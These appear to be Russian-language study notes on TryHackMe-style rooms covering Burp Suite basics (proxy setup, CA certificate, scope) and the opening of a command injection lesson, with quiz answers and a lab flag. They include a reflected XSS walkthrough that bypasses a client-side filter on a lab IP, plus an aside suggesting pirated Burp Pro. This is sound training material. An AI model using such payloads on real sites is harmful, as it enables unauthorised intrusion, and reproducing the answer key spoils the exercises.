Мы также представим ядро фреймворка Burp Suite — Burp Proxy . Важно отметить, что этот раздел в первую очередь служит базовым ресурсом для получения знаний о Burp Suite . В последующих разделах модуля Burp будет использоваться более практический подход. Таким образом, в этом разделе будет больше внимания уделено теоретическому содержанию. Если вы еще не использовали Burp Suite , рекомендуется внимательно прочитать предоставленную информацию и активно взаимодействовать с инструментом. Экспериментирование необходимо для понимания основ этого фреймворка. Сочетание представленной здесь информации с практическим изучением заложит прочную основу для использования фреймворка. Это значительно поможет вам в будущих разделах.

2. Что такое Burp Suite?

По сути, Burp Suite — это Java-фреймворк, разработанный как комплексное решение для проведения тестирования веб-приложений на проникновение. Он стал отраслевым стандартом для практической оценки безопасности веб- и мобильных приложений, включая те, которые используют интерфейсы прикладного программирования ( API ) .

Проще говоря, Burp Suite перехватывает и позволяет манипулировать всем HTTP /HTTPS-трафиком между браузером и веб-сервером. Эта фундаментальная возможность составляет основу фреймворка. Перехватывая запросы, пользователи получают возможность направлять их к различным компонентам фреймворка Burp Suite , которые мы рассмотрим в следующих разделах. Возможность перехватывать, просматривать и изменять веб-запросы до того, как они достигнут целевого сервера, или даже манипулировать ответами до того, как они будут получены нашим браузером, делает Burp Suite бесценным инструментом для ручного тестирования веб-приложений.

Burp Suite доступен в различных редакциях. В данном случае мы сосредоточимся на Burp Suite Community Edition , которая находится в свободном доступе для некоммерческого использования в рамках правовых норм. Однако стоит отметить, что Burp Suite также предлагает редакции Professional и Enterprise, которые обладают расширенными функциями и требуют лицензирования:

Burp Suite Professional — это версия Burp Suite Community без ограничений. Она включает в себя такие функции, как:
Вкратце, Burp Suite Professional — это очень мощный инструмент, что делает его предпочтительным выбором для профессионалов в этой области.

Автоматизированный сканер уязвимостей.
Фаззер/метод перебора, не имеющий ограничений по количеству запросов.
Сохранение проектов для дальнейшего использования и создания отчетов.
Встроенный API для интеграции с другими инструментами.
Неограниченный доступ для добавления новых расширений для расширения функциональности.
Доступ к Burp Suite Collaborator (фактически, это уникальный обработчик запросов, размещенный на собственном сервере или работающий на сервере, принадлежащем Portswigger).

В отличие от версий Community и Professional, Burp Suite Enterprise в основном используется для непрерывного сканирования. Он включает в себя автоматический сканер, который периодически проверяет веб-приложения на наличие уязвимостей, подобно тому, как такие инструменты, как Nessus, выполняют автоматическое сканирование инфраструктуры. В отличие от других версий, которые позволяют проводить атаки вручную с локального компьютера, Burp Suite Enterprise размещается на сервере и постоянно сканирует целевые веб-приложения на наличие потенциальных уязвимостей.

Поскольку для версий Professional и Enterprise требуется лицензия, мы сосредоточимся на основных функциях, предоставляемых версией Burp Suite Community Edition.

Вопрос: Какая версия Burp Suite работает на сервере и обеспечивает постоянное сканирование целевых веб-приложений?

Ответ: Burp Suite Enterprise

Вопрос: Burp Suite часто используется для атак на веб-приложения и ______ приложения.

Ответ: Mobile

3. Особенности сообщества Burp

Хотя Burp Suite Community предлагает более ограниченный набор функций по сравнению с профессиональной версией, он по-прежнему предоставляет впечатляющий набор инструментов, которые очень ценны для тестирования веб-приложений. Давайте рассмотрим некоторые из ключевых функций:

Прокси : Burp Proxy — наиболее известная составляющая Burp Suite . Он позволяет перехватывать и изменять запросы и ответы при взаимодействии с веб-приложениями.
Repeater : Еще одна хорошо известная функция. Repeater позволяет перехватывать, изменять и повторно отправлять один и тот же запрос несколько раз. Эта функциональность особенно полезна при создании полезных нагрузок методом проб и ошибок (например, при SQLi — внедрении структурированных запросов) или при тестировании функциональности конечной точки на наличие уязвимостей.
Intruder : Несмотря на ограничения скорости запросов в Burp Suite Community, Intruder позволяет рассылать запросы на конечные точки. Он часто используется для атак методом перебора паролей или фаззинга конечных точек.
Декодер : Декодер предоставляет ценную услугу по преобразованию данных. Он может декодировать захваченную информацию или кодировать полезные нагрузки перед отправкой их целевому объекту. Хотя для этой цели существуют альтернативные сервисы, использование декодера в составе Burp Suite может быть очень эффективным.
Comparer : Как следует из названия, Comparer позволяет сравнивать два фрагмента данных на уровне слов или байтов. Хотя это не является эксклюзивной функцией Burp Suite , возможность отправлять потенциально большие сегменты данных непосредственно в инструмент сравнения с помощью одной комбинации клавиш значительно ускоряет процесс.
Секвенсор : Секвенсор обычно используется для оценки случайности токенов, таких как значения сессионных cookie или другие предположительно сгенерированные случайным образом данные. Если алгоритм, используемый для генерации этих значений, не обеспечивает надежную случайность, это может открыть пути для разрушительных атак.

Помимо встроенных функций, Java-код Burp Suite упрощает разработку расширений для расширения функциональности фреймворка. Эти расширения могут быть написаны на Java, Python (с использованием интерпретатора Java Jython) или Ruby (с использованием интерпретатора Java JRuby). Модуль Burp Suite Extender позволяет быстро и легко загружать расширения во фреймворк, а магазин приложений BApp Store позволяет загружать модули сторонних разработчиков. Хотя для интеграции некоторых расширений может потребоваться профессиональная лицензия, для Burp Community доступно значительное количество расширений. Например, модуль Logger++ может расширить встроенную функциональность логирования Burp Suite .

Вопрос: Какая функция Burp Suite позволяет перехватывать запросы между нами и целевым объектом?

Ответ: Proxy

Вопрос: Какой инструмент Burp мы бы использовали для подбора паролей к форме авторизации методом перебора?

Ответ: Intruder

4. Установка

(в кали она уже есть, но можно и поискать pro версию по сети (очень легко))

Burp Suite — это один из тех инструментов, которые очень полезны для оценки веб- или мобильных приложений, пентестинга, поиска уязвимостей и даже отладки функций в веб-разработке. Вот руководство по установке Burp Suite на разных платформах:

Примечание: Если вы используете AttackBox, Burp Suite уже установлен, поэтому этот шаг можно пропустить.

Загрузки

Чтобы загрузить последнюю версию Burp Suite для других систем, вы можете нажать эту кнопку , чтобы перейти на страницу загрузки.

Kali Linux : Burp Suite предустановлен в Kali Linux . Если он отсутствует в вашей установке Kali, вы можете легко установить его из репозиториев apt Kali .

Linux , macOS и Windows: Для других операционных систем PortSwigger предоставляет отдельные установщики для Burp Suite Community и Burp Suite Professional на странице загрузок Burp Suite . Выберите свою операционную систему из выпадающего меню и выберите Burp Suite Community Edition . Затем нажмите кнопку «Загрузить» , чтобы начать загрузку.

Установка

Установите Burp Suite , используя соответствующий метод для вашей операционной системы. В Windows запустите исполняемый файл, а в Linux — выполните скрипт из терминала (с правами суперпользователя или без них). Если вы решите не использовать права суперпользователя sudoво время установки в Linux, Burp Suite будет установлен в ваш домашний каталог по адресу ~/BurpSuiteCommunity/BurpSuiteCommunityи не будет добавлен в вашу папку PATH.

Мастер установки предоставляет четкие инструкции, и, как правило, безопасно принять настройки по умолчанию. Однако всегда рекомендуется внимательно изучить установщик.

После успешной установки Burp Suite вы можете запустить приложение. В следующем задании мы рассмотрим начальную настройку и конфигурацию.

5. Панель управления

В AttackBox можно использовать предустановленную версию Burp Suite Community Edition. Чтобы запустить AttackBox, нажмите кнопку «Запустить AttackBox» в верхней части этой страницы.

После запуска Burp Suite и принятия условий использования вам будет предложено выбрать тип проекта. В Burp Suite Community выбор ограничен, и вы можете просто нажать «Далее» , чтобы продолжить.

В следующем окне вы можете выбрать конфигурацию Burp Suite. Как правило, рекомендуется оставить настройки по умолчанию, которые подходят для большинства ситуаций. Нажмите «Запустить Burp» , чтобы открыть главный интерфейс Burp Suite .

При первом запуске Burp Suite вы можете увидеть экран с вариантами обучения. Настоятельно рекомендуется ознакомиться с этими обучающими материалами, когда у вас будет время.

Если вы не видите обучающий экран (или в последующих сессиях), вам будет показана панель управления Burp, которая поначалу может показаться сложной. Однако вскоре вы к ней привыкнете.

Панель управления Burp разделена на четыре квадранта, обозначенных против часовой стрелки, начиная с верхнего левого угла:

Задачи : Меню «Задачи» позволяет определять фоновые задачи, которые Burp Suite будет выполнять во время использования приложения. В Burp Suite Community для наших целей в этом модуле достаточно задачи «Пассивное сканирование в реальном времени», которая автоматически регистрирует посещенные страницы. Burp Suite Professional предлагает дополнительные функции, такие как сканирование по запросу.
Журнал событий : Журнал событий содержит информацию о действиях, выполняемых Burp Suite , таких как запуск прокси-сервера , а также подробные сведения о соединениях, установленных через Burp.
Информация об уязвимостях : Этот раздел относится к Burp Suite Professional. В нем отображаются уязвимости, выявленные автоматическим сканером, ранжированные по степени серьезности и с возможностью фильтрации в зависимости от достоверности обнаружения уязвимости.
Консультативное сообщение : Раздел «Консультативное сообщение» содержит более подробную информацию об обнаруженных уязвимостях, включая ссылки и предлагаемые способы их устранения. Эту информацию можно экспортировать в отчет. В Burp Suite Community этот раздел может не отображать никаких уязвимостей.

На всех вкладках и в окнах Burp Suite вы заметите значки вопросительного знака (

Нажатие на эти значки открывает новое окно с полезной информацией, относящейся к данному разделу. Эти значки справки бесценны, когда вам нужна помощь или разъяснение по той или иной функции, поэтому обязательно используйте их эффективно.

Изучая различные вкладки и функции Burp Suite , вы постепенно освоите его возможности.

Вопрос: Какое меню предоставляет информацию о действиях, выполняемых Burp Suite, таких как запуск прокси-сервера, и подробные сведения о соединениях, установленных через Burp?

Ответ: Event log

6. Навигация

В Burp Suite навигация по умолчанию осуществляется в основном через верхние панели меню, которые позволяют переключаться между модулями и получать доступ к различным подвкладкам внутри каждого модуля. Подвкладки отображаются во второй панели меню, расположенной непосредственно под основной панелью меню.

Вот как работает навигация:

Выбор модуля : В верхней строке панели меню отображаются доступные модули Burp Suite . Вы можете щелкнуть по каждому модулю, чтобы переключаться между ними. Например, на изображении ниже выбран модуль Burp Proxy .
Вложенные вкладки : Если выбранный модуль имеет несколько вложенных вкладок, доступ к ним можно получить через вторую строку меню, которая появляется непосредственно под основной строкой меню. Эти вложенные вкладки часто содержат настройки и параметры, специфичные для модуля. Например, на изображении выше выбрана вкладка «Перехват прокси» в модуле Burp Proxy .
Отсоединение вкладок : Если вы предпочитаете просматривать несколько вкладок по отдельности, вы можете отсоединить их в отдельные окна. Для этого перейдите в меню приложения над панелью выбора модулей , выберите пункт « Окно ». Затем выберите опцию «Отсоединить», и выбранная вкладка откроется в отдельном окне. Отсоединенные вкладки можно снова соединить тем же способом.

Burp Suite также предоставляет сочетания клавиш для быстрой навигации по вкладкам. По умолчанию доступны следующие сочетания клавиш:

Вопрос: На какую вкладку переключится комбинация клавиш Ctrl + Shift + P ?

Ответ: Proxy tab

7. Параметры

Прежде чем углубиться в Burp Proxy , давайте рассмотрим доступные параметры настройки Burp Suite . Существует два типа настроек: глобальные настройки (также известные как пользовательские настройки) и настройки проекта.

Глобальные настройки : Эти настройки влияют на всю установку Burp Suite и применяются каждый раз при запуске приложения. Они обеспечивают базовую конфигурацию для вашей среды Burp Suite .
Настройки проекта : Эти настройки относятся к текущему проекту и применяются только во время сеанса. Однако обратите внимание, что Burp Suite Community Edition не поддерживает сохранение проектов, поэтому все параметры, относящиеся к конкретному проекту, будут потеряны при закрытии Burp.Чтобы получить доступ к настройкам, нажмите кнопку «Настройки» в верхней панели навигации. Откроется отдельное окно настроек.Ниже представлено изображение, демонстрирующее отдельное окно настроек.

В окне настроек слева вы найдете меню. Это меню позволяет переключаться между различными типами настроек, включая:

Поиск : Позволяет искать определенные настройки по ключевым словам.
Фильтр по типу : фильтрует настройки параметров пользователя и проекта .

Пользовательские настройки : Отображает настройки, влияющие на всю установку Burp Suite .
Настройки проекта : Отображает настройки, специфичные для текущего проекта.

Категории : Позволяет выбирать настройки по категориям.

Стоит отметить, что многие инструменты в Burp Suite предоставляют ярлыки для доступа к определенным категориям настроек. Например, модуль «Прокси» включает кнопку « Настройки прокси» , которая открывает окно настроек непосредственно в соответствующем разделе прокси .

Функция поиска на странице настроек — ценное дополнение, позволяющее быстро находить нужные настройки по ключевым словам.

Уделите время ознакомлению с набором настраиваемых параметров в Burp Suite . Как только вы освоитесь, можете приступить к упражнениям, связанным с настройкой параметров Burp Suite .

Вопрос: В какой категории можно найти упоминание о «банке для печенья»?

Ответ: Sessions

Вопрос: В какой базовой категории находится подкатегория «Обновления», которая управляет процессом обновления Burp Suite?

Ответ: Suite

Вопрос: Как называется подкатегория, позволяющая изменять сочетания клавиш для быстрых команд в Burp Suite?

Ответ: Hotkeys

Вопрос: Если мы загрузили клиентские TLS-сертификаты, можем ли мы переопределить их для каждого проекта отдельно (да/нет)?

Ответ: yea

8. Введение в Burp Proxy

Burp Proxy — это фундаментальный и важнейший инструмент в составе Burp Suite . Он позволяет перехватывать запросы и ответы между пользователем и целевым веб-сервером. Перехваченный трафик может быть обработан, отправлен другим инструментам для дальнейшей обработки или явно разрешен для дальнейшего продвижения к месту назначения.

Основные моменты, которые необходимо понимать о Burp Proxy.

Перехват запросов: Когда запросы поступают через Burp Proxy , они перехватываются и не достигают целевого сервера. Запросы отображаются на вкладке «Прокси» , что позволяет выполнять дальнейшие действия, такие как переадресация, отбрасывание, редактирование или отправка их в другие модули Burp. Чтобы отключить перехват и разрешить прохождение запросов через прокси без прерывания, нажмите кнопку. Intercept is on
Получение контроля: Возможность перехватывать запросы позволяет тестировщикам получить полный контроль над веб-трафиком, что делает ее бесценной для тестирования веб-приложений.
Захват и ведение журналов: Burp Suite по умолчанию захватывает и регистрирует запросы, поступающие через прокси-сервер , даже если перехват отключен. Эта функция ведения журналов может быть полезна для последующего анализа и проверки предыдущих запросов.
Поддержка WebSocket: Burp Suite также перехватывает и регистрирует обмен данными по протоколу WebSocket, что оказывает дополнительную помощь при анализе веб-приложений.
Журналы и история: Захваченные запросы можно просмотреть на вкладках « История HTTP» и «История WebSockets» , что позволяет проводить ретроспективный анализ и при необходимости отправлять запросы в другие модули Burp.Доступ к параметрам прокси -сервера можно получить, нажав кнопку « Настройки прокси» . Эти параметры обеспечивают расширенный контроль над поведением и функциональностью прокси-сервера . Ознакомьтесь с этими параметрами, чтобы оптимизировать использование Burp Proxy .

Некоторые важные особенности настроек прокси-сервера .

Перехват ответов: По умолчанию прокси-сервер не перехватывает ответы сервера, если это явно не запрошено для каждого запроса отдельно. Флажок «Перехватывать ответы на основе следующих правил», наряду с определенными правилами, позволяет более гибко перехватывать ответы.
Функция « Сопоставление и замена»: Раздел «Сопоставление и замена» в настройках прокси-сервера позволяет использовать регулярные выражения (regex) для изменения входящих и исходящих запросов. Эта функция позволяет вносить динамические изменения, такие как изменение пользовательского агента или манипулирование файлами cookie.

Уделите время изучению и экспериментированию с параметрами прокси-сервера , это улучшит ваше понимание и навыки работы с инструментом.

9. Подключение через прокси-сервер (FoxyProxy)

Запустите устройство, нажав кнопку «Запустить устройство» ниже.

Стартовая машина

Для использования прокси Burp Suite необходимо настроить локальный веб-браузер для перенаправления трафика через Burp Suite . В этом задании мы сосредоточимся на настройке прокси с помощью расширения FoxyProxy в Firefox.

Обратите внимание, что приведенные инструкции относятся только к Firefox. Если вы используете другой браузер, вам может потребоваться найти альтернативные методы или воспользоваться инструментом TryHackMe AttackBox.

Вот шаги по настройке прокси-сервера Burp Suite с помощью FoxyProxy:

Установите FoxyProxy: Загрузите и установите расширение FoxyProxy Basic .Примечание: FoxyProxy уже установлен на AttackBox.
Доступ к настройкам FoxyProxy: После установки в правом верхнем углу браузера Firefox появится кнопка. Нажмите на кнопку FoxyProxy, чтобы открыть всплывающее окно с настройками FoxyProxy.

Создание конфигурации прокси Burp : Во всплывающем окне параметров FoxyProxy нажмите кнопку «Параметры» . Откроется новая вкладка браузера с настройками FoxyProxy. Нажмите кнопку «Добавить» , чтобы создать новую конфигурацию прокси .

Добавление данных прокси : На странице «Добавить прокси » заполните следующие поля:

Титул: Burp(или любое другое предпочтительное имя)
IP-адрес прокси:127.0.0.1
Порт:8080

Сохранить конфигурацию: Нажмите «Сохранить» , чтобы сохранить конфигурацию Burp Proxy.
Активация конфигурации прокси: Щелкните значок FoxyProxy в правом верхнем углу браузера Firefox и выберите Burp конфигурацию. Это перенаправит трафик вашего браузера через 127.0.0.1:8080. Обратите внимание, что для выполнения запросов при активации этой конфигурации в браузере должен быть запущен Burp Suite.

Включите перехват прокси-сервера в Burp Suite: Переключитесь на Burp Suite и убедитесь, что функция перехвата включена на вкладке «Прокси» .

Проверка прокси: Откройте Firefox и попробуйте зайти на какой-нибудь сайт, например, на главную страницу http://10.49.140.62/. Ваш браузер зависнет, и прокси-сервер обработает HTTP- запрос. Поздравляем, вы успешно перехватили свой первый запрос!

Запомните следующее:

Если в Burp Suite активирована конфигурация прокси-сервера и включен перехват запросов , ваш браузер будет зависать при каждом запросе.
Будьте осторожны и не оставляйте функцию перехвата включенной случайно, так как это может помешать вашему браузеру отправлять какие-либо запросы.
Щелчок правой кнопкой мыши по запросу в Burp Suite позволяет выполнять различные действия, такие как пересылка, удаление, отправка в другие инструменты или выбор параметров из контекстного меню.

Обратите внимание на эти сведения, когда начнете использовать Burp Suite Proxy

10. Карта сайта и определения тем

Вкладка «Цель» в Burp Suite предоставляет не только возможность управления областью тестирования. Она состоит из трех подвкладок:

Карта сайта : Эта вкладка позволяет отобразить целевые веб-приложения в виде древовидной структуры. Каждая страница, которую мы посещаем во время работы прокси-сервера , будет отображаться на карте сайта. Эта функция позволяет автоматически создавать карту сайта, просто просматривая веб-приложение. В Burp Suite Professional мы также можем использовать карту сайта для автоматического сканирования целевого объекта, изучая ссылки между страницами и отображая как можно больше элементов сайта. Даже в Burp Suite Community мы можем использовать карту сайта для сбора данных на начальных этапах перечисления. Она особенно полезна для отображения API, поскольку любые конечные точки API, к которым обращается веб-приложение, будут зафиксированы на карте сайта.
Определение уязвимостей : Хотя Burp Community не включает в себя полный функционал сканирования уязвимостей, доступный в Burp Suite Professional, у нас все же есть доступ к списку всех уязвимостей, которые ищет сканер. В разделе «Определение уязвимостей» представлен обширный список веб-уязвимостей с описаниями и ссылками. Этот ресурс может быть полезен для указания уязвимостей в отчетах или для описания конкретной уязвимости, которая могла быть выявлена в ходе ручного тестирования.
Настройки области действия : Этот параметр позволяет нам управлять областью действия в Burp Suite . Он позволяет включать или исключать определенные домены/ IP-адреса , чтобы определить область тестирования. Управляя областью действия, мы можем сосредоточиться на конкретных веб-приложениях, которые мы тестируем, и избежать перехвата ненужного трафика.

В целом, вкладка «Цель» предлагает функции, выходящие за рамки определения области действия, позволяя нам составлять карту веб-приложений, уточнять область действия цели и получать доступ к исчерпывающему списку веб-уязвимостей для справочных целей.

Испытание

Осмотрите сайт http://10.49.140.62/— мы будем часто использовать этот инструмент на протяжении всего модуля. Посетите каждую вторую страницу, на которую ведет ссылка с главной страницы, а затем проверьте карту сайта — один из конечных адресов должен выделяться как очень необычный!

Погнали

вот что нашел бурп на сайте пока я его тыкал

Вопрос о небычной конечной точки, сразу находим её ( тут просто ищем по сайту ссылку)

Вопрос: Какой флаг вы получаете после посещения необычной конечной точки?

Ответ: THM{NmNlZTliNGE1MWU1ZTQzMzgzNmFiNWVk}

11. Браузер Burp Suite

(да у него есть возможность запуститься через браузер и от туда уже получать трафик - но мы это не используем потому что настроили прокси через FoxyProxy)

Если предыдущие задания показались вам слишком сложными, не волнуйтесь, эта тема будет намного проще.

Помимо модификации нашего обычного веб-браузера для работы с прокси-сервером , Burp Suite также включает в себя встроенный браузер Chromium, предварительно настроенный на использование прокси-сервера без каких-либо изменений, которые нам только что пришлось внести.

Чтобы запустить браузер Burp, нажмите Open Browserкнопку на вкладке «Прокси». Откроется окно Chromium, и все запросы, сделанные в этом браузере, будут проходить через прокси.

Примечание: В параметрах проекта и пользовательских настройках есть множество параметров, связанных с Burp Browser. Обязательно изучите и настройте их по своему усмотрению.

Однако, если вы запускаете Burp Suite в Linux от имени пользователя root (как в случае с AttackBox), вы можете столкнуться с ошибкой, препятствующей запуску Burp Browser из-за невозможности создать изолированную среду.

Есть два простых решения этой проблемы:

Разумный вариант: создайте нового пользователя и запустите Burp Suite под учетной записью с низкими привилегиями, чтобы браузер Burp работал без проблем.
Простой вариант: перейдите в настройки Settings -> Tools -> Burp's browserи отметьте этот Allow Burp's browser to run without a sandbox параметр. Включение этой опции позволит браузеру запускаться без песочницы . Однако имейте в виду, что по умолчанию эта опция отключена по соображениям безопасности. Если вы решите включить её, будьте осторожны, так как взлом браузера может предоставить злоумышленнику доступ ко всей вашей машине. В учебной среде AttackBox это вряд ли станет серьёзной проблемой, но используйте её ответственно.

12. Определение масштабов и целевое планирование

( ЭТО ТОЖЕ НАСТРОЙКА ЧИСТО БЕЗ ПРОКСИ - А ТУПО ПО ПРЯМОМУ ЗАБИРАТЬ ТРАФИК ЧЕРЕЗ ВАШ БРАУЗЕР) - НЕ СТОИТ - ЮЗАЙТЕ FoxyProxy

Наконец, мы переходим к одному из важнейших аспектов использования Burp Proxy : определению области действия .

Сбор и регистрация всего трафика может быстро стать непосильной и неудобной задачей, особенно когда нам нужно сосредоточиться только на конкретных веб-приложениях. Вот тут-то и пригодится определение области действия.

Задав область действия проекта, мы можем определить, что будет передаваться через прокси и записываться в лог в Burp Suite . Мы можем ограничить Burp Suite тестированием только тех веб-приложений, которые мы хотим протестировать. Самый простой способ сделать это — перейти на вкладку Target, щелкнуть правой кнопкой мыши по целевому приложению в списке слева и выбрать Add To Scope. Затем Burp предложит нам выбрать, хотим ли мы прекратить запись в лог всего, что не входит в область действия, и в большинстве случаев нам следует выбрать yes.

Чтобы проверить область действия, можно перейти на вкладку « Настройки области действия» во вкладке «Цель» .

Окно настроек области действия позволяет нам управлять целевой областью действия, включая или исключая домены/IP-адреса. Этот раздел очень функционален, и стоит уделить время его изучению.

Однако, даже если мы отключим логирование для трафика, выходящего за рамки области действия, прокси-сервер все равно будет перехватывать все. Чтобы предотвратить это, нам нужно перейти на вкладку « Настройки прокси-сервераAnd URL Is in target scope » и выбрать раздел «Перехват запросов клиентов».

Включение этой опции гарантирует, что прокси-сервер полностью игнорирует любой трафик, не входящий в заданную область видимости, что обеспечивает более наглядное отображение трафика в Burp Suite .

Добавьте http://10.49.140.62/в область действия и измените настройки прокси-сервера таким образом, чтобы он перехватывал только трафик к целевым объектам, входящим в область действия.

Наконец, мы переходим к одному из важнейших аспектов использования Burp Proxy : определению области действия .

Добавьте http://10.49.140.62/в область действия и измените настройки прокси-сервера таким образом, чтобы он перехватывал только трафик к целевым объектам, входящим в область действия.

13. Проксирование HTTPS

( ТУТ ОЧЕНЬ ДОЛГО И МУТОРНО РАССПИЫВАЮТ КАК ОНО ДОЛЖНО РАБОТАТЬ, НУЖЕН СЕРТИФИКАТ ДЛЯ БРАУЗЕРА, ЧТОБЫ СТРАНИЦЫ КОГДА ПЕРЕХВАТЫВАЕШЬ ИЛИ ПУКСКАЕШЬ ПО НИМ ТРАФИК, НЕ УЛЕТАЛИ В ОТКАЗ ИЗ ЗА ТОГО ЧТО БУРП НЕДОВЕРЕННЫЙ СЕРТИФИКАТ)

Примечание: AttackBox уже настроен для решения задачи, поставленной в этом задании. Если вы используете AttackBox и не хотите читать информацию здесь, можете перейти к следующему заданию.

При перехвате HTTP- трафика могут возникнуть проблемы при переходе на сайты с включенным TLS . Например, при доступе к сайту типа [ссылка на сайт https://google.com/] может появиться ошибка, указывающая на то, что центр сертификации PortSwigger (CA) не уполномочен защищать соединение. Это происходит потому, что браузер не доверяет сертификату, предоставленному Burp Suite.

Чтобы решить эту проблему, мы можем вручную добавить сертификат центра сертификации PortSwigger в список доверенных центров сертификации нашего браузера. Вот как это сделать:

Загрузите сертификат центра сертификации: После активации Burp Proxy перейдите по адресу http://burp/cert. Это загрузит файл с именем cacert.der. Сохраните этот файл где-нибудь на вашем компьютере.
Чтобы получить доступ к настройкам сертификатов Firefox: введите about:preferencesв адресную строку Firefox и нажмите Enter . Это переведет вас на страницу настроек Firefox. Найдите на странице «сертификаты» и нажмите кнопку « Просмотреть сертификаты» .
Импортируйте сертификат центра сертификации: в окне «Диспетчер сертификатов» нажмите кнопку «Импорт» . Выберите cacert.derфайл, который вы скачали на предыдущем шаге.
Настройка доверия для сертификата центра сертификации : В появившемся окне установите флажок «Доверять этому центру сертификации для идентификации веб-сайтов» и нажмите ОК.

Выполнив эти шаги, мы добавили сертификат центра сертификации PortSwigger в наш список доверенных центров сертификации. Теперь мы сможем посещать любые сайты с поддержкой TLS без возникновения ошибки сертификата.

Для наглядной демонстрации всего процесса импорта сертификатов вы можете посмотреть следующее видео:

Следуя этим инструкциям, вы можете гарантировать, что ваш браузер будет доверять сертификату центра сертификации PortSwigger и безопасно взаимодействовать с веб-сайтами, поддерживающими TLS, через прокси-сервер Burp Suite .

14. Пример атаки

Рассмотрев, как настроить прокси-сервер , давайте перейдем к упрощенному примеру из реальной жизни.

Начнём с рассмотрения формы обратной связи по адресу http://10.49.140.62/ticket/:

В реальных условиях тестирования веб-приложений на проникновение мы проверяем это на множество вещей, одной из которых является межсайтовая скриптовая атака (XSS). Если вы еще не сталкивались с XSS, то это можно представить как внедрение клиентского скрипта (обычно на JavaScript) в веб-страницу таким образом, что он выполняется. Существуют различные виды XSS — тип, который мы используем здесь, называется «отраженной» XSS, поскольку он затрагивает только того, кто отправляет веб-запрос.

Пошаговое руководство

Попробуйте ввести: <script>alert("Succ3ssful XSS")</script>, в поле «Контактный адрес электронной почты». Вы обнаружите, что сработал фильтр на стороне клиента, который не позволяет добавлять специальные символы, недопустимые в адресах электронной почты:

К счастью, клиентские фильтры невероятно легко обойти. Существует множество способов отключить скрипт или просто предотвратить его загрузку.

Давайте пока сосредоточимся на том, чтобы просто обойти фильтр.

Во-первых, убедитесь, что ваш Burp Proxy активен и что функция перехвата включена.

Теперь введите корректные данные в форму запроса в службу поддержки. Например: "pentester@example.thm" в качестве адреса электронной почты и "Test Attack" в качестве запроса.

Отправьте форму — запрос должен быть перехвачен прокси-сервером.

После перехвата запроса прокси-сервером мы можем изменить поле электронной почты, указав в нем нашу простую полезную нагрузку, описанную выше: <script>alert("Succ3ssful XSS")</script>. После вставки полезной нагрузки нам нужно выделить ее, а затем закодировать URL-адрес с помощью Ctrl + Uсочетания клавиш, чтобы сделать ее безопасной для отправки. Этот процесс показан на GIF-анимации ниже:

Наконец, нажмите кнопку «Переслать», чтобы отправить запрос.

На сайте должно появиться всплывающее окно с предупреждением об успешной XSS- атаке!

15. Заключение

Поздравляем с завершением комнаты «Основы Burp»! Теперь вы обладаете прочным пониманием интерфейса Burp Suite , параметров конфигурации и Burp Proxy . Эти навыки будут необходимы вам в дальнейшем в сфере тестирования на проникновение веб- и мобильных приложений.

Для дальнейшего совершенствования ваших навыков я рекомендую вам практиковаться и экспериментировать с Burp Suite . Изучите его возможности, попробуйте различные конфигурации и ознакомьтесь с его разнообразными инструментами. Чем больше вы будете использовать Burp Suite , тем более опытными вы станете в выявлении и использовании уязвимостей в веб-приложениях.

В следующей комнате модуля мы углубимся в изучение Burp Suite Repeater , еще одного мощного инструмента для ручного тестирования и обработки запросов веб-приложений. Продолжайте учиться и проявляйте любопытство!

Сохраняйте любопытство и продолжайте учиться!

День 35. Command Injection

2026-02-23T16:14:02.783Z

Узнайте об уязвимости, позволяющей выполнять команды через уязвимое приложение, и о способах ее устранения.

Начнем

1. Введение (Что такое внедрение команд?)

В этой комнате мы рассмотрим веб-уязвимость, называемую внедрением команд . После того, как мы разберемся, что это за уязвимость, мы продемонстрируем ее влияние и риски, которые она представляет для приложения.

Затем вы сможете применить эти знания на практике, а именно:

Как обнаружить уязвимость внедрения команд
Как протестировать и использовать эту уязвимость с помощью полезных нагрузок, разработанных для разных операционных систем.
Как предотвратить эту уязвимость в приложении
В заключение, в конце занятия вы сможете применить теоретические знания на практике.

Для начала давайте разберемся, что такое внедрение команд . Внедрение команд — это злоупотребление поведением приложения для выполнения команд в операционной системе с использованием тех же привилегий, с которыми приложение работает на устройстве. Например, внедрение команд на веб-сервере, работающем от имени пользователя с именем, joeприведет к выполнению команд от имени этого joeпользователя — и, следовательно, к получению всех имеющихся у него разрешений joe.

Внедрение команд также часто называют «удалённым выполнением кода» (RCE) из-за возможности удалённого выполнения кода внутри приложения. Эти уязвимости часто наиболее выгодны для злоумышленника, поскольку означают, что он может напрямую взаимодействовать с уязвимой системой. Например, злоумышленник может читать системные или пользовательские файлы, данные и тому подобное.

Например, возможность злоупотребить приложением для выполнения команды, whoamiпозволяющей вывести список учетных записей пользователей, работающих в этом приложении, будет примером внедрения команд .

Внедрение команд вошло в десятку наиболее распространенных уязвимостей, о которых сообщалось в отчете Contrast Security AppSec Intelligence за 2019 год ( Contrast Security AppSec., 2019 ). Более того, фреймворк OWASP постоянно предлагает уязвимости такого рода в качестве одной из десяти наиболее распространенных уязвимостей веб-приложений ( фреймворк OWASP ).

2. Обнаружение внедрения команд

Эта уязвимость существует потому, что приложения часто используют функции в таких языках программирования, как PHP , Python и NodeJS, для передачи данных и выполнения системных вызовов в операционной системе компьютера. Например, для получения входных данных из поля и поиска записи в файле. В качестве примера рассмотрим приведенный ниже фрагмент кода:

В этом фрагменте кода приложение принимает данные, которые пользователь вводит в поле ввода с именем$title Чтобы найти название песни в каталоге, давайте разберем этот процесс на несколько простых шагов.

1. Приложение сохраняет MP3-файлы в каталоге, расположенном в операционной системе.

2. Пользователь вводит название песни, которую хочет найти. Приложение сохраняет этот ввод в $titleпеременную.

3. Данные из этой $titleпеременной передаются команде grepдля поиска в текстовом файле с именем songtitle.txt записи , которую пользователь желает найти.

4. Результат поиска по файлу songtitle.txt определит , сообщит ли приложение пользователю о существовании песни или нет.

Обычно подобная информация хранится в базе данных; однако это лишь пример того, как приложение получает ввод от пользователя для взаимодействия с операционной системой.

Злоумышленник может злоупотребить этим приложением, внедрив в него собственные команды для выполнения. Вместо того чтобы использовать его grepдля поиска записи в файле songtitle.txt, он может попросить приложение прочитать данные из более конфиденциального файла.

Злоупотребление приложениями таким образом возможно независимо от используемого языка программирования. Пока приложение обрабатывает и выполняет его, это может привести к внедрению команд. Например, приведенный ниже фрагмент кода — это приложение, написанное на Python.

Обратите внимание, что от вас не требуется понимание синтаксиса этих приложений. Однако, для наглядности, я также описал шаги работы этого приложения на Python.

Пакет "flask" используется для настройки веб-сервера.
Функция, использующая пакет "subprocess" для выполнения команды на устройстве.
